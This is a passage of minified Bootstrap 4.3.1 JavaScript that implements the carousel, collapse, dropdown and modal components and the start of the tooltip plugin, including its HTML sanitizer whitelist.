this.cycle();var i=n<t?W:q;this._slide(i,this._items[t])}},t.dispose=function(){g(this._element).off(H),g.removeData(this._element,j),this._items=null,this._config=null,this._element=null,this._interval=null,this._isPaused=null,this._isSliding=null,this._activeElement=null,this._indicatorsElement=null},t._getConfig=function(t){return t=l({},F,t),_.typeCheckConfig(L,t,U),t},t._handleSwipe=function(){var t=Math.abs(this.touchDeltaX);if(!(t<=40)){var e=t/this.touchDeltaX;0<e&&this.prev(),e<0&&this.next()}},t._addEventListeners=function(){var e=this;this._config.keyboard&&g(this._element).on(Q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&g(this._element).on(Q.MOUSEENTER,function(t){return e.pause(t)}).on(Q.MOUSELEAVE,function(t){return e.cycle(t)}),this._config.touch&&this._addTouchEventListeners()},t._addTouchEventListeners=function(){var n=this;if(this._touchSupported){var e=function(t){n._pointerEvent&&at[t.originalEvent.pointerType.toUpperCase()]?n.touchStartX=t.originalEvent.clientX:n._pointerEvent||(n.touchStartX=t.originalEvent.touches[0].clientX)},i=function(t){n._pointerEvent&&at[t.originalEvent.pointerType.toUpperCase()]&&(n.touchDeltaX=t.originalEvent.clientX-n.touchStartX),n._handleSwipe(),"hover"===n._config.pause&&(n.pause(),n.touchTimeout&&clearTimeout(n.touchTimeout),n.touchTimeout=setTimeout(function(t){return n.cycle(t)},500+n._config.interval))};g(this._element.querySelectorAll(nt)).on(Q.DRAG_START,function(t){return t.preventDefault()}),this._pointerEvent?(g(this._element).on(Q.POINTERDOWN,function(t){return e(t)}),g(this._element).on(Q.POINTERUP,function(t){return i(t)}),this._element.classList.add(J)):(g(this._element).on(Q.TOUCHSTART,function(t){return e(t)}),g(this._element).on(Q.TOUCHMOVE,function(t){var e;(e=t).originalEvent.touches&&1<e.originalEvent.touches.length?n.touchDeltaX=0:n.touchDeltaX=e.originalEvent.touches[0].clientX-n.touchStartX}),g(this._element).on(Q.TOUCHEND,function(t){return i(t)}))}},t._keydown=function(t){if(!/input|textarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},t._getItemIndex=function(t){return this._items=t&&t.parentNode?[].slice.call(t.parentNode.querySelectorAll(et)):[],this._items.indexOf(t)},t._getItemByDirection=function(t,e){var n=t===W,i=t===q,o=this._getItemIndex(e),r=this._items.length-1;if((i&&0===o||n&&o===r)&&!this._config.wrap)return e;var s=(o+(t===q?-1:1))%this._items.length;return-1===s?this._items[this._items.length-1]:this._items[s]},t._triggerSlideEvent=function(t,e){var n=this._getItemIndex(t),i=this._getItemIndex(this._element.querySelector(tt)),o=g.Event(Q.SLIDE,{relatedTarget:t,direction:e,from:i,to:n});return g(this._element).trigger(o),o},t._setActiveIndicatorElement=function(t){if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll(Z));g(e).removeClass(V);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&g(n).addClass(V)}},t._slide=function(t,e){var n,i,o,r=this,s=this._element.querySelector(tt),a=this._getItemIndex(s),l=e||s&&this._getItemByDirection(t,s),c=this._getItemIndex(l),h=Boolean(this._interval);if(o=t===W?(n=X,i=$,M):(n=z,i=G,K),l&&g(l).hasClass(V))this._isSliding=!1;else if(!this._triggerSlideEvent(l,o).isDefaultPrevented()&&s&&l){this._isSliding=!0,h&&this.pause(),this._setActiveIndicatorElement(l);var u=g.Event(Q.SLID,{relatedTarget:l,direction:o,from:a,to:c});if(g(this._element).hasClass(Y)){g(l).addClass(i),_.reflow(l),g(s).addClass(n),g(l).addClass(n);var f=parseInt(l.getAttribute("data-interval"),10);this._config.interval=f?(this._config.defaultInterval=this._config.defaultInterval||this._config.interval,f):this._config.defaultInterval||this._config.interval;var d=_.getTransitionDurationFromElement(s);g(s).one(_.TRANSITION_END,function(){g(l).removeClass(n+" "+i).addClass(V),g(s).removeClass(V+" "+i+" "+n),r._isSliding=!1,setTimeout(function(){return g(r._element).trigger(u)},0)}).emulateTransitionEnd(d)}else g(s).removeClass(V),g(l).addClass(V),this._isSliding=!1,g(this._element).trigger(u);h&&this.cycle()}},r._jQueryInterface=function(i){return this.each(function(){var t=g(this).data(j),e=l({},F,g(this).data());"object"==typeof i&&(e=l({},e,i));var n="string"==typeof i?i:e.slide;if(t||(t=new r(this,e),g(this).data(j,t)),"number"==typeof i)t.to(i);else if("string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&e.ride&&(t.pause(),t.cycle())})},r._dataApiClickHandler=function(t){var e=_.getSelectorFromElement(this);if(e){var n=g(e)[0];if(n&&g(n).hasClass(B)){var i=l({},g(n).data(),g(this).data()),o=this.getAttribute("data-slide-to");o&&(i.interval=!1),r._jQueryInterface.call(g(n),i),o&&g(n).data(j).to(o),t.preventDefault()}}},s(r,null,[{key:"VERSION",get:function(){return"4.3.1"}},{key:"Default",get:function(){return F}}]),r}();g(document).on(Q.CLICK_DATA_API,rt,lt._dataApiClickHandler),g(window).on(Q.LOAD_DATA_API,function(){for(var t=[].slice.call(document.querySelectorAll(st)),e=0,n=t.length;e<n;e++){var i=g(t[e]);lt._jQueryInterface.call(i,i.data())}}),g.fn[L]=lt._jQueryInterface,g.fn[L].Constructor=lt,g.fn[L].noConflict=function(){return g.fn[L]=x,lt._jQueryInterface};var ct="collapse",ht="bs.collapse",ut="."+ht,ft=g.fn[ct],dt={toggle:!0,parent:""},gt={toggle:"boolean",parent:"(string|element)"},_t={SHOW:"show"+ut,SHOWN:"shown"+ut,HIDE:"hide"+ut,HIDDEN:"hidden"+ut,CLICK_DATA_API:"click"+ut+".data-api"},mt="show",pt="collapse",vt="collapsing",yt="collapsed",Et="width",Ct="height",Tt=".show, .collapsing",St='[data-toggle="collapse"]',bt=function(){function a(e,t){this._isTransitioning=!1,this._element=e,this._config=this._getConfig(t),this._triggerArray=[].slice.call(document.querySelectorAll('[data-toggle="collapse"][href="#'+e.id+'"],[data-toggle="collapse"][data-target="#'+e.id+'"]'));for(var n=[].slice.call(document.querySelectorAll(St)),i=0,o=n.length;i<o;i++){var r=n[i],s=_.getSelectorFromElement(r),a=[].slice.call(document.querySelectorAll(s)).filter(function(t){return t===e});null!==s&&0<a.length&&(this._selector=s,this._triggerArray.push(r))}this._parent=this._config.parent?this._getParent():null,this._config.parent||this._addAriaAndCollapsedClass(this._element,this._triggerArray),this._config.toggle&&this.toggle()}var t=a.prototype;return t.toggle=function(){g(this._element).hasClass(mt)?this.hide():this.show()},t.show=function(){var t,e,n=this;if(!this._isTransitioning&&!g(this._element).hasClass(mt)&&(this._parent&&0===(t=[].slice.call(this._parent.querySelectorAll(Tt)).filter(function(t){return"string"==typeof n._config.parent?t.getAttribute("data-parent")===n._config.parent:t.classList.contains(pt)})).length&&(t=null),!(t&&(e=g(t).not(this._selector).data(ht))&&e._isTransitioning))){var i=g.Event(_t.SHOW);if(g(this._element).trigger(i),!i.isDefaultPrevented()){t&&(a._jQueryInterface.call(g(t).not(this._selector),"hide"),e||g(t).data(ht,null));var o=this._getDimension();g(this._element).removeClass(pt).addClass(vt),this._element.style[o]=0,this._triggerArray.length&&g(this._triggerArray).removeClass(yt).attr("aria-expanded",!0),this.setTransitioning(!0);var r="scroll"+(o[0].toUpperCase()+o.slice(1)),s=_.getTransitionDurationFromElement(this._element);g(this._element).one(_.TRANSITION_END,function(){g(n._element).removeClass(vt).addClass(pt).addClass(mt),n._element.style[o]="",n.setTransitioning(!1),g(n._element).trigger(_t.SHOWN)}).emulateTransitionEnd(s),this._element.style[o]=this._element[r]+"px"}}},t.hide=function(){var t=this;if(!this._isTransitioning&&g(this._element).hasClass(mt)){var e=g.Event(_t.HIDE);if(g(this._element).trigger(e),!e.isDefaultPrevented()){var n=this._getDimension();this._element.style[n]=this._element.getBoundingClientRect()[n]+"px",_.reflow(this._element),g(this._element).addClass(vt).removeClass(pt).removeClass(mt);var i=this._triggerArray.length;if(0<i)for(var o=0;o<i;o++){var r=this._triggerArray[o],s=_.getSelectorFromElement(r);if(null!==s)g([].slice.call(document.querySelectorAll(s))).hasClass(mt)||g(r).addClass(yt).attr("aria-expanded",!1)}this.setTransitioning(!0);this._element.style[n]="";var a=_.getTransitionDurationFromElement(this._element);g(this._element).one(_.TRANSITION_END,function(){t.setTransitioning(!1),g(t._element).removeClass(vt).addClass(pt).trigger(_t.HIDDEN)}).emulateTransitionEnd(a)}}},t.setTransitioning=function(t){this._isTransitioning=t},t.dispose=function(){g.removeData(this._element,ht),this._config=null,this._parent=null,this._element=null,this._triggerArray=null,this._isTransitioning=null},t._getConfig=function(t){return(t=l({},dt,t)).toggle=Boolean(t.toggle),_.typeCheckConfig(ct,t,gt),t},t._getDimension=function(){return g(this._element).hasClass(Et)?Et:Ct},t._getParent=function(){var t,n=this;_.isElement(this._config.parent)?(t=this._config.parent,"undefined"!=typeof this._config.parent.jquery&&(t=this._config.parent[0])):t=document.querySelector(this._config.parent);var e='[data-toggle="collapse"][data-parent="'+this._config.parent+'"]',i=[].slice.call(t.querySelectorAll(e));return g(i).each(function(t,e){n._addAriaAndCollapsedClass(a._getTargetFromElement(e),[e])}),t},t._addAriaAndCollapsedClass=function(t,e){var n=g(t).hasClass(mt);e.length&&g(e).toggleClass(yt,!n).attr("aria-expanded",n)},a._getTargetFromElement=function(t){var e=_.getSelectorFromElement(t);return e?document.querySelector(e):null},a._jQueryInterface=function(i){return this.each(function(){var t=g(this),e=t.data(ht),n=l({},dt,t.data(),"object"==typeof i&&i?i:{});if(!e&&n.toggle&&/show|hide/.test(i)&&(n.toggle=!1),e||(e=new a(this,n),t.data(ht,e)),"string"==typeof i){if("undefined"==typeof e[i])throw new TypeError('No method named "'+i+'"');e[i]()}})},s(a,null,[{key:"VERSION",get:function(){return"4.3.1"}},{key:"Default",get:function(){return dt}}]),a}();g(document).on(_t.CLICK_DATA_API,St,function(t){"A"===t.currentTarget.tagName&&t.preventDefault();var n=g(this),e=_.getSelectorFromElement(this),i=[].slice.call(document.querySelectorAll(e));g(i).each(function(){var t=g(this),e=t.data(ht)?"toggle":n.data();bt._jQueryInterface.call(t,e)})}),g.fn[ct]=bt._jQueryInterface,g.fn[ct].Constructor=bt,g.fn[ct].noConflict=function(){return g.fn[ct]=ft,bt._jQueryInterface};var It="dropdown",Dt="bs.dropdown",wt="."+Dt,At=".data-api",Nt=g.fn[It],Ot=new RegExp("38|40|27"),kt={HIDE:"hide"+wt,HIDDEN:"hidden"+wt,SHOW:"show"+wt,SHOWN:"shown"+wt,CLICK:"click"+wt,CLICK_DATA_API:"click"+wt+At,KEYDOWN_DATA_API:"keydown"+wt+At,KEYUP_DATA_API:"keyup"+wt+At},Pt="disabled",Lt="show",jt="dropup",Ht="dropright",Rt="dropleft",xt="dropdown-menu-right",Ft="position-static",Ut='[data-toggle="dropdown"]',Wt=".dropdown form",qt=".dropdown-menu",Mt=".navbar-nav",Kt=".dropdown-menu .dropdown-item:not(.disabled):not(:disabled)",Qt="top-start",Bt="top-end",Vt="bottom-start",Yt="bottom-end",zt="right-start",Xt="left-start",$t={offset:0,flip:!0,boundary:"scrollParent",reference:"toggle",display:"dynamic"},Gt={offset:"(number|string|function)",flip:"boolean",boundary:"(string|element)",reference:"(string|element)",display:"string"},Jt=function(){function c(t,e){this._element=t,this._popper=null,this._config=this._getConfig(e),this._menu=this._getMenuElement(),this._inNavbar=this._detectNavbar(),this._addEventListeners()}var t=c.prototype;return t.toggle=function(){if(!this._element.disabled&&!g(this._element).hasClass(Pt)){var t=c._getParentFromElement(this._element),e=g(this._menu).hasClass(Lt);if(c._clearMenus(),!e){var n={relatedTarget:this._element},i=g.Event(kt.SHOW,n);if(g(t).trigger(i),!i.isDefaultPrevented()){if(!this._inNavbar){if("undefined"==typeof u)throw new TypeError("Bootstrap's dropdowns require Popper.js (https://popper.js.org/)");var o=this._element;"parent"===this._config.reference?o=t:_.isElement(this._config.reference)&&(o=this._config.reference,"undefined"!=typeof this._config.reference.jquery&&(o=this._config.reference[0])),"scrollParent"!==this._config.boundary&&g(t).addClass(Ft),this._popper=new u(o,this._menu,this._getPopperConfig())}"ontouchstart"in document.documentElement&&0===g(t).closest(Mt).length&&g(document.body).children().on("mouseover",null,g.noop),this._element.focus(),this._element.setAttribute("aria-expanded",!0),g(this._menu).toggleClass(Lt),g(t).toggleClass(Lt).trigger(g.Event(kt.SHOWN,n))}}}},t.show=function(){if(!(this._element.disabled||g(this._element).hasClass(Pt)||g(this._menu).hasClass(Lt))){var t={relatedTarget:this._element},e=g.Event(kt.SHOW,t),n=c._getParentFromElement(this._element);g(n).trigger(e),e.isDefaultPrevented()||(g(this._menu).toggleClass(Lt),g(n).toggleClass(Lt).trigger(g.Event(kt.SHOWN,t)))}},t.hide=function(){if(!this._element.disabled&&!g(this._element).hasClass(Pt)&&g(this._menu).hasClass(Lt)){var t={relatedTarget:this._element},e=g.Event(kt.HIDE,t),n=c._getParentFromElement(this._element);g(n).trigger(e),e.isDefaultPrevented()||(g(this._menu).toggleClass(Lt),g(n).toggleClass(Lt).trigger(g.Event(kt.HIDDEN,t)))}},t.dispose=function(){g.removeData(this._element,Dt),g(this._element).off(wt),this._element=null,(this._menu=null)!==this._popper&&(this._popper.destroy(),this._popper=null)},t.update=function(){this._inNavbar=this._detectNavbar(),null!==this._popper&&this._popper.scheduleUpdate()},t._addEventListeners=function(){var e=this;g(this._element).on(kt.CLICK,function(t){t.preventDefault(),t.stopPropagation(),e.toggle()})},t._getConfig=function(t){return t=l({},this.constructor.Default,g(this._element).data(),t),_.typeCheckConfig(It,t,this.constructor.DefaultType),t},t._getMenuElement=function(){if(!this._menu){var t=c._getParentFromElement(this._element);t&&(this._menu=t.querySelector(qt))}return this._menu},t._getPlacement=function(){var t=g(this._element.parentNode),e=Vt;return t.hasClass(jt)?(e=Qt,g(this._menu).hasClass(xt)&&(e=Bt)):t.hasClass(Ht)?e=zt:t.hasClass(Rt)?e=Xt:g(this._menu).hasClass(xt)&&(e=Yt),e},t._detectNavbar=function(){return 0<g(this._element).closest(".navbar").length},t._getOffset=function(){var e=this,t={};return"function"==typeof this._config.offset?t.fn=function(t){return t.offsets=l({},t.offsets,e._config.offset(t.offsets,e._element)||{}),t}:t.offset=this._config.offset,t},t._getPopperConfig=function(){var t={placement:this._getPlacement(),modifiers:{offset:this._getOffset(),flip:{enabled:this._config.flip},preventOverflow:{boundariesElement:this._config.boundary}}};return"static"===this._config.display&&(t.modifiers.applyStyle={enabled:!1}),t},c._jQueryInterface=function(e){return this.each(function(){var t=g(this).data(Dt);if(t||(t=new c(this,"object"==typeof e?e:null),g(this).data(Dt,t)),"string"==typeof e){if("undefined"==typeof t[e])throw new TypeError('No method named "'+e+'"');t[e]()}})},c._clearMenus=function(t){if(!t||3!==t.which&&("keyup"!==t.type||9===t.which))for(var e=[].slice.call(document.querySelectorAll(Ut)),n=0,i=e.length;n<i;n++){var o=c._getParentFromElement(e[n]),r=g(e[n]).data(Dt),s={relatedTarget:e[n]};if(t&&"click"===t.type&&(s.clickEvent=t),r){var a=r._menu;if(g(o).hasClass(Lt)&&!(t&&("click"===t.type&&/input|textarea/i.test(t.target.tagName)||"keyup"===t.type&&9===t.which)&&g.contains(o,t.target))){var l=g.Event(kt.HIDE,s);g(o).trigger(l),l.isDefaultPrevented()||("ontouchstart"in document.documentElement&&g(document.body).children().off("mouseover",null,g.noop),e[n].setAttribute("aria-expanded","false"),g(a).removeClass(Lt),g(o).removeClass(Lt).trigger(g.Event(kt.HIDDEN,s)))}}}},c._getParentFromElement=function(t){var e,n=_.getSelectorFromElement(t);return n&&(e=document.querySelector(n)),e||t.parentNode},c._dataApiKeydownHandler=function(t){if((/input|textarea/i.test(t.target.tagName)?!(32===t.which||27!==t.which&&(40!==t.which&&38!==t.which||g(t.target).closest(qt).length)):Ot.test(t.which))&&(t.preventDefault(),t.stopPropagation(),!this.disabled&&!g(this).hasClass(Pt))){var e=c._getParentFromElement(this),n=g(e).hasClass(Lt);if(n&&(!n||27!==t.which&&32!==t.which)){var i=[].slice.call(e.querySelectorAll(Kt));if(0!==i.length){var o=i.indexOf(t.target);38===t.which&&0<o&&o--,40===t.which&&o<i.length-1&&o++,o<0&&(o=0),i[o].focus()}}else{if(27===t.which){var r=e.querySelector(Ut);g(r).trigger("focus")}g(this).trigger("click")}}},s(c,null,[{key:"VERSION",get:function(){return"4.3.1"}},{key:"Default",get:function(){return $t}},{key:"DefaultType",get:function(){return Gt}}]),c}();g(document).on(kt.KEYDOWN_DATA_API,Ut,Jt._dataApiKeydownHandler).on(kt.KEYDOWN_DATA_API,qt,Jt._dataApiKeydownHandler).on(kt.CLICK_DATA_API+" "+kt.KEYUP_DATA_API,Jt._clearMenus).on(kt.CLICK_DATA_API,Ut,function(t){t.preventDefault(),t.stopPropagation(),Jt._jQueryInterface.call(g(this),"toggle")}).on(kt.CLICK_DATA_API,Wt,function(t){t.stopPropagation()}),g.fn[It]=Jt._jQueryInterface,g.fn[It].Constructor=Jt,g.fn[It].noConflict=function(){return g.fn[It]=Nt,Jt._jQueryInterface};var Zt="modal",te="bs.modal",ee="."+te,ne=g.fn[Zt],ie={backdrop:!0,keyboard:!0,focus:!0,show:!0},oe={backdrop:"(boolean|string)",keyboard:"boolean",focus:"boolean",show:"boolean"},re={HIDE:"hide"+ee,HIDDEN:"hidden"+ee,SHOW:"show"+ee,SHOWN:"shown"+ee,FOCUSIN:"focusin"+ee,RESIZE:"resize"+ee,CLICK_DISMISS:"click.dismiss"+ee,KEYDOWN_DISMISS:"keydown.dismiss"+ee,MOUSEUP_DISMISS:"mouseup.dismiss"+ee,MOUSEDOWN_DISMISS:"mousedown.dismiss"+ee,CLICK_DATA_API:"click"+ee+".data-api"},se="modal-dialog-scrollable",ae="modal-scrollbar-measure",le="modal-backdrop",ce="modal-open",he="fade",ue="show",fe=".modal-dialog",de=".modal-body",ge='[data-toggle="modal"]',_e='[data-dismiss="modal"]',me=".fixed-top, .fixed-bottom, .is-fixed, .sticky-top",pe=".sticky-top",ve=function(){function o(t,e){this._config=this._getConfig(e),this._element=t,this._dialog=t.querySelector(fe),this._backdrop=null,this._isShown=!1,this._isBodyOverflowing=!1,this._ignoreBackdropClick=!1,this._isTransitioning=!1,this._scrollbarWidth=0}var t=o.prototype;return t.toggle=function(t){return this._isShown?this.hide():this.show(t)},t.show=function(t){var e=this;if(!this._isShown&&!this._isTransitioning){g(this._element).hasClass(he)&&(this._isTransitioning=!0);var n=g.Event(re.SHOW,{relatedTarget:t});g(this._element).trigger(n),this._isShown||n.isDefaultPrevented()||(this._isShown=!0,this._checkScrollbar(),this._setScrollbar(),this._adjustDialog(),this._setEscapeEvent(),this._setResizeEvent(),g(this._element).on(re.CLICK_DISMISS,_e,function(t){return e.hide(t)}),g(this._dialog).on(re.MOUSEDOWN_DISMISS,function(){g(e._element).one(re.MOUSEUP_DISMISS,function(t){g(t.target).is(e._element)&&(e._ignoreBackdropClick=!0)})}),this._showBackdrop(function(){return e._showElement(t)}))}},t.hide=function(t){var e=this;if(t&&t.preventDefault(),this._isShown&&!this._isTransitioning){var n=g.Event(re.HIDE);if(g(this._element).trigger(n),this._isShown&&!n.isDefaultPrevented()){this._isShown=!1;var i=g(this._element).hasClass(he);if(i&&(this._isTransitioning=!0),this._setEscapeEvent(),this._setResizeEvent(),g(document).off(re.FOCUSIN),g(this._element).removeClass(ue),g(this._element).off(re.CLICK_DISMISS),g(this._dialog).off(re.MOUSEDOWN_DISMISS),i){var o=_.getTransitionDurationFromElement(this._element);g(this._element).one(_.TRANSITION_END,function(t){return e._hideModal(t)}).emulateTransitionEnd(o)}else this._hideModal()}}},t.dispose=function(){[window,this._element,this._dialog].forEach(function(t){return g(t).off(ee)}),g(document).off(re.FOCUSIN),g.removeData(this._element,te),this._config=null,this._element=null,this._dialog=null,this._backdrop=null,this._isShown=null,this._isBodyOverflowing=null,this._ignoreBackdropClick=null,this._isTransitioning=null,this._scrollbarWidth=null},t.handleUpdate=function(){this._adjustDialog()},t._getConfig=function(t){return t=l({},ie,t),_.typeCheckConfig(Zt,t,oe),t},t._showElement=function(t){var e=this,n=g(this._element).hasClass(he);this._element.parentNode&&this._element.parentNode.nodeType===Node.ELEMENT_NODE||document.body.appendChild(this._element),this._element.style.display="block",this._element.removeAttribute("aria-hidden"),this._element.setAttribute("aria-modal",!0),g(this._dialog).hasClass(se)?this._dialog.querySelector(de).scrollTop=0:this._element.scrollTop=0,n&&_.reflow(this._element),g(this._element).addClass(ue),this._config.focus&&this._enforceFocus();var i=g.Event(re.SHOWN,{relatedTarget:t}),o=function(){e._config.focus&&e._element.focus(),e._isTransitioning=!1,g(e._element).trigger(i)};if(n){var r=_.getTransitionDurationFromElement(this._dialog);g(this._dialog).one(_.TRANSITION_END,o).emulateTransitionEnd(r)}else o()},t._enforceFocus=function(){var e=this;g(document).off(re.FOCUSIN).on(re.FOCUSIN,function(t){document!==t.target&&e._element!==t.target&&0===g(e._element).has(t.target).length&&e._element.focus()})},t._setEscapeEvent=function(){var e=this;this._isShown&&this._config.keyboard?g(this._element).on(re.KEYDOWN_DISMISS,function(t){27===t.which&&(t.preventDefault(),e.hide())}):this._isShown||g(this._element).off(re.KEYDOWN_DISMISS)},t._setResizeEvent=function(){var e=this;this._isShown?g(window).on(re.RESIZE,function(t){return e.handleUpdate(t)}):g(window).off(re.RESIZE)},t._hideModal=function(){var t=this;this._element.style.display="none",this._element.setAttribute("aria-hidden",!0),this._element.removeAttribute("aria-modal"),this._isTransitioning=!1,this._showBackdrop(function(){g(document.body).removeClass(ce),t._resetAdjustments(),t._resetScrollbar(),g(t._element).trigger(re.HIDDEN)})},t._removeBackdrop=function(){this._backdrop&&(g(this._backdrop).remove(),this._backdrop=null)},t._showBackdrop=function(t){var e=this,n=g(this._element).hasClass(he)?he:"";if(this._isShown&&this._config.backdrop){if(this._backdrop=document.createElement("div"),this._backdrop.className=le,n&&this._backdrop.classList.add(n),g(this._backdrop).appendTo(document.body),g(this._element).on(re.CLICK_DISMISS,function(t){e._ignoreBackdropClick?e._ignoreBackdropClick=!1:t.target===t.currentTarget&&("static"===e._config.backdrop?e._element.focus():e.hide())}),n&&_.reflow(this._backdrop),g(this._backdrop).addClass(ue),!t)return;if(!n)return void t();var i=_.getTransitionDurationFromElement(this._backdrop);g(this._backdrop).one(_.TRANSITION_END,t).emulateTransitionEnd(i)}else if(!this._isShown&&this._backdrop){g(this._backdrop).removeClass(ue);var o=function(){e._removeBackdrop(),t&&t()};if(g(this._element).hasClass(he)){var r=_.getTransitionDurationFromElement(this._backdrop);g(this._backdrop).one(_.TRANSITION_END,o).emulateTransitionEnd(r)}else o()}else t&&t()},t._adjustDialog=function(){var t=this._element.scrollHeight>document.documentElement.clientHeight;!this._isBodyOverflowing&&t&&(this._element.style.paddingLeft=this._scrollbarWidth+"px"),this._isBodyOverflowing&&!t&&(this._element.style.paddingRight=this._scrollbarWidth+"px")},t._resetAdjustments=function(){this._element.style.paddingLeft="",this._element.style.paddingRight=""},t._checkScrollbar=function(){var t=document.body.getBoundingClientRect();this._isBodyOverflowing=t.left+t.right<window.innerWidth,this._scrollbarWidth=this._getScrollbarWidth()},t._setScrollbar=function(){var o=this;if(this._isBodyOverflowing){var t=[].slice.call(document.querySelectorAll(me)),e=[].slice.call(document.querySelectorAll(pe));g(t).each(function(t,e){var n=e.style.paddingRight,i=g(e).css("padding-right");g(e).data("padding-right",n).css("padding-right",parseFloat(i)+o._scrollbarWidth+"px")}),g(e).each(function(t,e){var n=e.style.marginRight,i=g(e).css("margin-right");g(e).data("margin-right",n).css("margin-right",parseFloat(i)-o._scrollbarWidth+"px")});var n=document.body.style.paddingRight,i=g(document.body).css("padding-right");g(document.body).data("padding-right",n).css("padding-right",parseFloat(i)+this._scrollbarWidth+"px")}g(document.body).addClass(ce)},t._resetScrollbar=function(){var t=[].slice.call(document.querySelectorAll(me));g(t).each(function(t,e){var n=g(e).data("padding-right");g(e).removeData("padding-right"),e.style.paddingRight=n||""});var e=[].slice.call(document.querySelectorAll(""+pe));g(e).each(function(t,e){var n=g(e).data("margin-right");"undefined"!=typeof n&&g(e).css("margin-right",n).removeData("margin-right")});var n=g(document.body).data("padding-right");g(document.body).removeData("padding-right"),document.body.style.paddingRight=n||""},t._getScrollbarWidth=function(){var t=document.createElement("div");t.className=ae,document.body.appendChild(t);var e=t.getBoundingClientRect().width-t.clientWidth;return document.body.removeChild(t),e},o._jQueryInterface=function(n,i){return this.each(function(){var t=g(this).data(te),e=l({},ie,g(this).data(),"object"==typeof n&&n?n:{});if(t||(t=new o(this,e),g(this).data(te,t)),"string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n](i)}else e.show&&t.show(i)})},s(o,null,[{key:"VERSION",get:function(){return"4.3.1"}},{key:"Default",get:function(){return ie}}]),o}();g(document).on(re.CLICK_DATA_API,ge,function(t){var e,n=this,i=_.getSelectorFromElement(this);i&&(e=document.querySelector(i));var o=g(e).data(te)?"toggle":l({},g(e).data(),g(this).data());"A"!==this.tagName&&"AREA"!==this.tagName||t.preventDefault();var r=g(e).one(re.SHOW,function(t){t.isDefaultPrevented()||r.one(re.HIDDEN,function(){g(n).is(":visible")&&n.focus()})});ve._jQueryInterface.call(g(e),o,this)}),g.fn[Zt]=ve._jQueryInterface,g.fn[Zt].Constructor=ve,g.fn[Zt].noConflict=function(){return g.fn[Zt]=ne,ve._jQueryInterface};var ye=["background","cite","href","itemtype","longdesc","poster","src","xlink:href"],Ee={"*":["class","dir","id","lang","role",/^aria-[\w-]*$/i],a:["target","href","title","rel"],area:[],b:[],br:[],col:[],code:[],div:[],em:[],hr:[],h1:[],h2:[],h3:[],h4:[],h5:[],h6:[],i:[],img:["src","alt","title","width","height"],li:[],ol:[],p:[],pre:[],s:[],small:[],span:[],sub:[],sup:[],strong:[],u:[],ul:[]},Ce=/^(?:(?:https?|mailto|ftp|tel|file):|[^&:/?#]*(?:[/?#]|$))/gi,Te=/^data:(?:image\/(?:bmp|gif|jpeg|jpg|png|tiff|webp)|video\/(?:mpeg|mp4|ogg|webm)|audio\/(?:mp3|oga|ogg|opus));base64,[a-z0-9+/]+=*$/i;function Se(t,s,e){if(0===t.length)return t;if(e&&"function"==typeof e)return e(t);for(var n=(new window.DOMParser).parseFromString(t,"text/html"),a=Object.keys(s),l=[].slice.call(n.body.querySelectorAll("*")),i=function(t,e){var n=l[t],i=n.nodeName.toLowerCase();if(-1===a.indexOf(n.nodeName.toLowerCase()))return n.parentNode.removeChild(n),"continue";var o=[].slice.call(n.attributes),r=[].concat(s["*"]||[],s[i]||[]);o.forEach(function(t){(function(t,e){var n=t.nodeName.toLowerCase();if(-1!==e.indexOf(n))return-1===ye.indexOf(n)||Boolean(t.nodeValue.match(Ce)||t.nodeValue.match(Te));for(var i=e.filter(function(t){return t instanceof RegExp}),o=0,r=i.length;o<r;o++)if(n.match(i[o]))return!0;return!1})(t,r)||n.removeAttribute(t.nodeName)})},o=0,r=l.length;o<r;o++)i(o);return n.body.innerHTML}var be="tooltip",Ie="bs.tooltip",De="."+Ie,we=g.fn[be],Ae="bs-tooltip",Ne=new RegExp("(^|\\s)"+Ae+"\\S+","g"),Oe=["sanitize","whiteList","sanitizeFn"],ke={animation:"boolean",template:"string",title:"(string|element|function)",trigger:"string",delay:"(number|object)",html:"boolean",selector:"(string|boolean)",placement:"(string|function)",offset:"(number|string|function)",container:"(string|element|boolean)",fallbackPlacement:"(string|array)",boundary:"(string|element)",sanitize:"boolean",sanitizeFn:"(null|function)",whiteList:"object"},Pe={AUTO:"auto",TOP:"top",RIGHT:"right",BOTTOM:"bottom",LEFT:"left"},Le={animation:!0,template:'<div class="tooltip" role="tooltip"><div class="arrow"></div><div class="tooltip-inner"></div></div>',trigger:"hover focus",title:"",delay:0,html:!1,selector:!1,placement:"top",offset:0,container:!1,fallbackPlacement:"flip",boundary:"scrollParent",sanitize:!0,sanitizeFn:null,whiteList:Ee},je="show",He="out",Re={HIDE:"hide"+De,HIDDEN:"hidden"+De,SHOW:"show"+De,SHOWN:"shown"+De,INSERTED:"inserted"+De,CLICK:"click"+De,FOCUSIN:"focusin"+De,FOCUSOUT:"focusout"+De,MOUSEENTER:"mouseenter"+De,MOUSELEAVE:"mouseleave"+De},xe="fade",Fe="show",Ue=".tooltip-inner",We=".arrow",qe="hover",Me="focus",Ke="click",Qe="manual",Be=function(){function i(t,e){if("undefined"==typeof u)throw new TypeError("Bootstrap's tooltips require Popper.js (https://popper.js.org/)");this._isEnabled=!0,this._timeout=0,this._hoverState="",this._activeTrigger={},this._popper=null,this.element=t,this.config=this._getConfig(e),this.tip=null,this._setListeners()}var t=i.prototype;return t.enable=function(){this._isEnabled=!0},t.disable=function(){this._isEnabled=!1},t.toggleEnabled=function(){this._isEnabled=!this._isEnabled},t.toggle=function(t){if(this._isEnabled)if(t){var e=this.constructor.DATA_KEY,n=g(t.currentTarget).data(e);n||(n=new this.constructor(t.currentTarget,this._getDelegateConfig()),g(t.currentTarget).data(e,n)),n._activeTrigger.click=!n._activeTrigger.click,n._isWithActiveTrigger()?n._enter(null,n):n._leave(null,n)}else{if(g(this.getTipElement()).hasClass(Fe))return void this._leave(null,this);this._enter(null,this)}},t.dispose=function(){clearTimeout(this._timeout),g.removeData(this.element,this.constructor.DATA_KEY),g(this.element).off(this.constructor.EVENT_KEY),g(this.element).closest(".modal").off("hide.bs.modal"),this.tip&&g(this.tip).remove(),this._isEnabled=null,this._timeout=null,this._hoverState=null,(this._activeTrigger=null)!==this._popper&&this._popper.destroy(),this._popper=null,this.element=null,this.config=null,this.tip=null},t.show=function(){var 